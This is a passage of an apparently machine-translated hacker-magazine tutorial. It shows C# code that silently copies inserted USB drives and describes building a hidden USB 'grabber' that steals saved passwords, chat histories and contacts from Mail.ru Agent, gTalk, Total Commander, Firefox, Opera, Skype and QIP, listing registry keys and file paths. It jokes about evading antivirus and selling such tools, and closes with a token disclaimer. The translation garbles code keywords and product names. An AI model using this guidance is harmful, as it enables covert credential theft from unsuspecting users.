    String dirName = Environment.GetCommandLineArgs() + "flash_" + DateTime.Now.ToString("dd-MM-yy-hh-mm-ss"); CreateDirectory(dirName); xDirectory flashcopier = new xDirectory(); flashcopier.IndexComplete += νέος IndexCompleteEventHandler(IndexComplete); flashcopier.ItemCopied += new ItemCopiedEventHandler(ItemCopied); flashcopier.CopyComplete += νέος CopyCompleteEventHandler(CopyComplete); flashcopier.Source = new DirectoryInfo(e.Drive.ToString()); flashcopier.Destination = new DirectoryInfo(dirName); flashcopier.Overwrite = true; flashcopier.FolderFilter = "*"; flashcopier.FileFilters.Add("*.doc"); flashcopier.FileFilters.Add("*.xls"); //Ορισμός άλλων φίλτρων //.... flashcopier.StartCopy();

    Στην αρχή της καταχώρισης, ορίζω τη διαδρομή προς το φάκελο όπου θα αντιγράψουμε τα περιεχόμενα της μονάδας flash. Θα αντιγράψουμε στον κατάλογο "flash_current date" που βρίσκεται μαζί με το φάκελο από τον οποίο εκκινείται η εφαρμογή μας - είναι πιο βολικό. Έχοντας αποφασίσει για το όνομα ενός φακέλου, προσπαθώ να τον δημιουργήσω χρησιμοποιώντας τη συνάρτηση CreateDirectory(). Έγραψα αυτή τη λειτουργία αποκλειστικά για ευκολία. Δημιουργεί μια παρουσία του αντικειμένου DirectoryInfo που έχει σχεδιαστεί για να λειτουργεί με καταλόγους και καλεί τη μέθοδο Create (), η οποία δημιουργεί έναν νέο φάκελο.

    Αφού δημιουργήσετε έναν φάκελο, μπορείτε να αντιγράψετε. Αντιγράφω όλα τα αρχεία χρησιμοποιώντας ένα αντικείμενο τύπου xDirectory. Εάν πληκτρολογήσετε μόνοι σας τον κώδικα από την καταχώριση, τότε όταν προσπαθείτε να μεταγλωττίσετε, ο μεταγλωττιστής θα δημιουργήσει ένα σφάλμα στο οποίο θα λέει ασπρόμαυρο: "Δεν βρέθηκε αντικείμενο αυτού του τύπου".

    Το θέμα είναι ότι το xDirectory είναι μια κλάση τρίτου κατασκευαστή. Μια φορά κι έναν καιρό, το βρήκα στο Διαδίκτυο και από τότε το χρησιμοποιώ συχνά στα έργα μου. Μου αρέσει γιατί αρκεί να καλέσετε μια μέθοδο για να αντιγράψετε υποφακέλους. Επιπλέον, σας επιτρέπει να ορίσετε φίλτρα.

    Πραγματικά κάντε χωρίς αυτό. Παίρνουμε τυπικές τάξεις, μια τεχνική πολύ γνωστή σε όλους τους προγραμματιστές - αναδρομή - και γράφουμε μερικές δεκάδες γραμμές κώδικα. Δυστυχώς, δεν θέλω να το κάνω αυτό. Είναι ο 21ος αιώνας στην αυλή, πρέπει να βελτιστοποιήσουμε τις ενέργειές μας στο μέγιστο και το xDirectory θα μας βοηθήσει σε αυτό.

    Η ενότητα με την κλάση βρίσκεται στον δίσκο μας και μπορείτε να μάθετε για το σκοπό των μεθόδων/ιδιοτήτων/γεγονότων κοιτάζοντας τον αντίστοιχο πίνακα.

    ιδιότητες της κλάσης xDirectory

    xDirectory Class Methods

    Δοκιμάστε να εκτελέσετε την εφαρμογή μας και να τοποθετήσετε μια μονάδα flash. Μετά από μερικά δευτερόλεπτα (ανάλογα με την ακαταστασία της μονάδας flash), όλα τα περιεχόμενα της μονάδας USB θα μεταφερθούν στο φάκελο από τον οποίο ξεκινήσατε την εφαρμογή που έχετε μόλις ψήσει.

    λαβή USB

    Τώρα ας εξετάσουμε το αντίστροφο πρόβλημα και ας μιλήσουμε για τις αποχρώσεις της δημιουργίας του λεγόμενου. λαβή μονάδας flash. Η αρχή της δημιουργίας είναι ακριβώς η ίδια. Πρέπει να γράψετε μια απλή εφαρμογή που θα εκτελείται αυτόματα μετά την εγκατάσταση μιας μονάδας flash.

    Στη διαδικασία της εργασίας, η εφαρμογή θα περάσει από τους φακέλους / τα κλειδιά μητρώου στους οποίους τα δημοφιλή προγράμματα αποθηκεύουν τους αποθηκευμένους κωδικούς πρόσβασης και, εάν είναι δυνατόν, θα αντιγράψουν όλες τις πληροφορίες σε έναν από τους φακέλους τους. Για να μην προκαλέσει το autorun σας υποψίες στον φτωχό χρήστη, κάντε τον κόπο να το κρύψετε προσεκτικά. Για παράδειγμα, κάτω από το μενού εκκίνησης.

    Πιθανότατα γνωρίζετε ότι οι λεγόμενες φορητές εκδόσεις εφαρμογών έχουν γίνει πολύ δημοφιλείς τώρα, δηλαδή προγράμματα που μπορούν να λειτουργήσουν απευθείας από μια μονάδα flash. Αυτός είναι ο καλύτερος τρόπος για να παίξετε. Σχεδιάστε το πρόγραμμα με το κατάλληλο στυλ και, για αξιοπιστία, ρίξτε μερικά κουμπιά που έχουν σχεδιαστεί για την εκκίνηση οποιωνδήποτε προγραμμάτων. Το σχέδιό μου φαίνεται στην εικόνα.

    Πώς θα ληστέψουμε;

    Πρέπει να πω αμέσως ότι δεν υπάρχει λόγος να εκτελείτε ενέργειες υπερ-χάκερ εδώ. Τα περισσότερα προγράμματα αποθηκεύουν προσωπικά δεδομένα στο φάκελο Documents and Settings\User\Application Data\%ProgramName% ή στο μητρώο. ProgramName σημαίνει οποιοδήποτε πρόγραμμα. Εάν αντιμετωπίζετε την πρώτη επιλογή, τότε θα πρέπει να χρησιμοποιήσετε την ήδη γνωστή κλάση xDirectory (ή τυπικές μεθόδους εργασίας με αρχεία) και να αντιγράψετε όλα όσα χρειάζεστε με αυτήν. Στη δεύτερη περίπτωση, θα πρέπει να εργαστείτε με το μητρώο. Δεν θα δώσω παράδειγμα αντιγραφής αρχείων (το έχουμε ήδη εξετάσει), αλλά θα σας δείξω πώς να αλληλεπιδράτε με το μητρώο χρησιμοποιώντας εργαλεία .NET (χρησιμοποιώντας το παράδειγμα προσδιορισμού της διαδρομής προς το φάκελο TC):

    RegistryKey readKey = Registry.CurrentUser.OpenSubKey(" software\\Ghisler\\ Συνολικός Διοικητής"); string key = (string) readKey.GetValue("InstallDir");

    Αυτό είναι όλο. Δεν θα υπάρχει άλλος κωδικός. Αυτή η γνώση θα πρέπει να είναι αρκετή για να τραβήξετε αρχεία με πολύτιμες πληροφορίες. Για να κάνω τα πράγματα λίγο πιο εύκολα, έχω ετοιμάσει μια λίστα με τα περισσότερα δημοφιλή προγράμματακαι ζωγράφισαν όλους τους τρόπους με τους οποίους αποθηκεύουν τα αποθηκευμένα δεδομένα χρήστη.

    Πράκτορας αλληλογραφίας

    Ο αγγελιοφόρος από το Mail.ru είναι πλέον πολύ δημοφιλής μεταξύ των απλών θνητών χρηστών (ειδικά μεταξύ των γυναικών). Οι στόχοι είναι ξεκάθαροι, τα καθήκοντα έχουν τεθεί, επομένως μας ενδιαφέρει:

  • Ιστορία. Το MA αποθηκεύει ολόκληρο το ιστορικό της αλληλογραφίας του χρήστη στα Έγγραφα και τη ρύθμιση\%User%\Application Data\Mra\base . Υπάρχει ένα αρχείο στον βασικό φάκελο mra.dbs. Αυτό, στην πραγματικότητα, είναι το αρχείο ιστορικού.
  • Λίστα επαφών. Η λίστα επαφών βρίσκεται στο φάκελο MRA\%user account%\clist5.txt. Λάβετε υπόψη ότι μπορεί να υπάρχουν πολλοί χρήστες που εργάζονται με το mail.agent (ή ένας χρήστης μπορεί να έχει πολλούς λογαριασμούς). Επομένως, θα ήταν πολύ λογικό να αντιγράψετε όλους τους φακέλους που περιέχουν το σύμβολο «@» στο όνομα.
  • Κωδικός πρόσβασης. Κωδικός πρόσβασης (ακριβέστερα, ο κατακερματισμός του) από λογαριασμόςΟ χρήστης βρίσκεται στο μητρώο κατά μήκος της διαδρομής - HKCU\Software\Mail.RU\Agent\magent_logins2\%Account% στην παράμετρο ####password.
  • gTalk

    Εταιρία Googleδημιουργεί βολικά και λειτουργικά προϊόντα, μεταξύ των οποίων υπάρχει ένας πελάτης Gabber - gTalk. Σήμερα gTalkόχι πολύ δημοφιλής ακόμα. Δεν είναι εγκατεστημένο σε κάθε δεύτερο υπολογιστή, αλλά μερικές φορές εξακολουθεί να εμφανίζεται και, για να είμαστε στο θέμα, είναι καλύτερα να μάθουμε αμέσως το πρόγραμμά μας να παίρνει κωδικούς πρόσβασης και από αυτό το messenger. Οι κωδικοί πρόσβασης για όλους τους λογαριασμούς gTalk αποθηκεύονται στο μητρώο - HHEY_CURRENT_USER\Software\Google\Google Talk\Accounts . Αυτός ο κλάδος παραθέτει όλους τους λογαριασμούς στους οποίους έχετε συνδεθεί ποτέ gTalk. Οι κωδικοί πρόσβασης λογαριασμού αποθηκεύονται σε παράμετρος συμβολοσειράς pw.

    Συνολικός Διοικητής

    Συνολικός Διοικητής- μακράν το πιο δημοφιλές διαχείριση αρχείων. Το πρόγραμμα περιέχει περίπου ένα βαγόνι και ένα μικρό καρότσι (και ο ίδιος αριθμός μπορεί να συνδεθεί σε αυτό χρησιμοποιώντας πρόσθετα πρόσθετα). Μας ενδιαφέρει μόνο ο ενσωματωμένος πελάτης FTP. Χρησιμοποιείται από πολλούς και οι κωδικοί πρόσβασης, φυσικά, αποθηκεύονται.

    Το TC, σε αντίθεση με πολλά άλλα προγράμματα, δεν αποθηκεύει κωδικούς πρόσβασης στο μητρώο, αλλά χρησιμοποιεί τα παλιά καλά αρχεία ini. Κωδικοί πρόσβασης, καθώς και όλα τα απαραίτητα δεδομένα για τη σύνδεση με τους διακομιστές (ip, port, όνομα χρήστη κ.λπ.) Συνολικός Διοικητήςαποθηκεύει σε ένα αρχείο wcx_ftp.ini, το οποίο βρίσκεται αθώα στο φάκελο του προγράμματος. Διαδρομή στον κατάλογο όπου είναι εγκατεστημένο Συνολικός Διοικητής, μπορείτε να μάθετε από το μητρώο. Ψάξτε στον κλάδο HKEY_CURRENT_USER\Software\Ghisler\Total Commander.

    firefox

    Σήμερα, ένα πρόγραμμα περιήγησης δεν είναι απλώς ένα πρόγραμμα για ταξίδια στο WEB, αλλά ένας ολόκληρος συνδυασμός που, εκτός από διάφορες δυνατότητες, αποθηκεύει πολλές εμπιστευτικές πληροφορίες. Χαρακτηριστικό παράδειγμα αυτού είναι οι φόρμες ιστού. Το 99% των σύγχρονων τοποθεσιών απαιτούν εγγραφή. Το να θυμάστε και να έχετε συνεχώς υπόψη τον συνδυασμό σύνδεσης / κωδικού πρόσβασης για κάθε ιστότοπο είναι μια μη ρεαλιστική εργασία, ειδικά εάν είστε προχωρημένος χρήστης και η πλοήγηση στο Διαδίκτυο δεν περιορίζεται μόνο στο Odnoklassniki και το VKontakte.

    Οι προγραμματιστές έχουν κάνει τη ζωή πιο εύκολη για τους χρήστες και έχουν ενσωματώσει τα λεγόμενα «θησαυροφυλάκια κωδικών πρόσβασης» στα προγράμματα. Εγγράφηκα, συνδέθηκα στον λογαριασμό μου, διέταξα το πρόγραμμα περιήγησης να θυμάται τα διαπιστευτήρια - και ξέχασα. Την επόμενη φορά που θα επισκεφθείτε, το μόνο που μένει είναι να κάνετε μερικά κλικ του ποντικιού και είστε ήδη στον ιστότοπο. Εφόσον το πρόγραμμα περιήγησης αποθηκεύει κωδικούς πρόσβασης, σημαίνει ότι έχουμε την ευκαιρία να κλέψουμε ολόκληρη τη βάση δεδομένων του.

  • sessionstore.js - το αρχείο περιέχει όλες τις αποθηκευμένες συνεδρίες.
  • signons3.txt - κρυπτογραφημένοι κωδικοί πρόσβασης (για την τρίτη έκδοση του FF).
  • signons.sqlite - βάση δεδομένων SQLite που περιέχει όλους τους κρυπτογραφημένους κωδικούς πρόσβασης.
  • key3.db - βάση δεδομένων που περιέχει κλειδιά για πιστοποιητικά.
  • Όλα αυτά τα αρχεία βρίσκονται στο γνωστό Document and Settings\%UserName%\Application Data\Mozilla\FireFox\Profiles\%ProfileName% .

    ΛΥΡΙΚΗ ΣΚΗΝΗ

    ΛΥΡΙΚΗ ΣΚΗΝΗ- ένα πρόγραμμα περιήγησης που είναι πολύ δημοφιλές στους Ρώσους χρήστες. Φυσικά, δεν μπορούμε να το αφήσουμε χωρίς επίβλεψη. Έτσι, με την Opera η κατάσταση είναι περίπου η ίδια όπως και με το FireFox. Όλοι οι κωδικοί πρόσβασης που είναι αποθηκευμένοι στο πρόγραμμα περιήγησης αποθηκεύονται στο Document and Settings\%UserName%\Application Data\Opera\profile στο αρχείο wand.dat. Αποδεικνύεται ότι όταν εντοπιστεί Opera, θα ενεργήσουμε με τον ίδιο τρόπο όπως στην περίπτωση του firefox.

    Skype

    Η δημοτικότητα του Skype αυξάνεται καθημερινά. Πολλοί άνθρωποι το χρησιμοποιούν όχι ως μέσο πραγματοποίησης κλήσεων, αλλά για μια συνηθισμένη βολική συνομιλία. Όλα τα εμπιστευτικά δεδομένα, όπως αναμενόταν, βρίσκονται στο προφίλ χρήστη (στο ίδιο σημείο όπου τα αποθηκεύει η Opera ή η FF). Για να τα "ιδιωτικοποιήσετε", θα πρέπει να αντιγράψετε το προφίλ χρήστη από το Document and Settings\%userName%\Application Data\Skype\ και να εξαγάγετε τον κλάδο μητρώου - HKEY_CURRENT_USER\Software\Skype\ProtectedStorage .

    QIP

    Όπως τα περισσότερα από τα προγράμματα που περιγράφηκαν προηγουμένως, το QIP αποθηκεύει όλους τους αποθηκευμένους κωδικούς πρόσβασης στο Application Data\qip.

    Η αντιγραφή ολοκληρώθηκε

    Η τεχνολογία .NET έχει απλοποιήσει πολύ το έργο μας, με αποτέλεσμα όλη η κωδικοποίηση να έχει περιοριστεί στην κλήση μερικών μεθόδων. Φυσικά, μπορείτε να πείτε ότι αυτό δεν είναι ωραίο και ότι τέτοια πράγματα είναι πολύ πιο αποτελεσματικά για να γράφετε σε WinAPI ή ASM "π.χ. Κατά κάποιο τρόπο, συμφωνώ μαζί σας, αλλά έχετε κατά νου, στο WinAPI και, ειδικά, στο Asma , γράψτε ένα τέτοιο πρόγραμμα όπως αυτό αλλά δεν θα τα καταφέρετε γρήγορα. Ενώ άλλοι γράφουν κώδικα χιλιομέτρων, εσείς και εγώ θα τρυγήσουμε. Καλή επιτυχία στον προγραμματισμό και αν έχετε ερωτήσεις, γράψτε στο σαπούνι.

    Μην ξεχνάτε, πολλοί χρήστες αποθηκεύουν εμπιστευτικές πληροφορίες στο φάκελο "Τα έγγραφά μου". Τουλάχιστον, μπορεί να υπάρχουν ενδιαφέροντα έγγραφα εργασίας και μερικές φορές ολόκληρα αρχεία με κωδικούς πρόσβασης. Κάποια στιγμή (στην πρώην δουλειά μου) βρήκα στον υπολογιστή του λογιστή ένα τακτοποιημένο αρχείο με κωδικούς πρόσβασης για πελάτες τραπεζών.

    Ως αληθινός φίλος, πρέπει να βοηθήσετε όλους αυτούς τους ανθρώπους να δημιουργήσουν αντίγραφα ασφαλείας των ευαίσθητων πληροφοριών τους.

    Πολλά φόρουμ χάκερ έχουν πολλές διαφημίσεις για την πώληση αυτού του είδους λογισμικού. Διαφορετικές τιμές - από 10$ έως 100$. Έχοντας ολοκληρώσει τα παραδείγματα που αναφέρονται στο άρθρο, μπορείτε να κερδίσετε μια κρούστα μαύρου ψωμιού με χαβιάρι. Επαναλαμβάνω, το κύριο πράγμα είναι να προσεγγίσουμε το θέμα δημιουργικά και όλα θα πάνε σίγουρα. Και πάλι, δεν εντοπίζεται από τα antivirus;).

    Προειδοποίηση!

    Χρησιμοποιούμε αυτό το πρόγραμμα αποκλειστικά για την έγκαιρη δημιουργία αντιγράφων ασφαλείας των περιεχομένων των μονάδων flash στο δίσκο και τη δημιουργία αντιγράφων ασφαλείας των κωδικών πρόσβασης σε μια μονάδα flash. Και τι νόμιζες; Η παράνομη χρήση τέτοιου λογισμικού τιμωρείται!